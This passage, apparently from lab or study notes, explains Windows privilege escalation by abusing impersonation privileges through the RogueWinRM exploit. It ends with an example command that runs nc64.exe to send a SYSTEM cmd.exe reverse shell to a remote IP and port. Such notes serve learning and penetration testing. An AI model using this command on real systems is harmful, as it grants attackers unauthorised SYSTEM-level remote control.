These permissions allow for user impersonation. On Windows, the Local Service and Network Service accounts already have these privileges; if IIS is installed, there will also often be an IIS AppPool/DefaultAppPool service account with these permissions as well.

However, it isn’t enough to just have access to a service running as a user with these permissions, as Windows will not allow an application to arbitrarily impersonate a user. Instead, we must have a service and then trick/force a highly privileged account to connect to it, at which point impersonation will be allowed.

One way to do this is using the RogueWinRM exploit. The idea here is that when a user logs in, the BITS service creates a connection on port 5985 to the (local) WinRM service (which is used to execute PowerShell commands) as SYSTEM. If the WinRM service isn’t running, RogueWinRM can be run instead to capture these connections (I’m guessing that the WinRM service can also be back-doored using RogueWinRM directly, but that doing so may interfere with system functionality?).

Example RogueWinRM command line:

C:\RogueWinRM.exe -p C:\nc64.exe `
                  -a "-e cmd.exe 10.13.25.33 4442"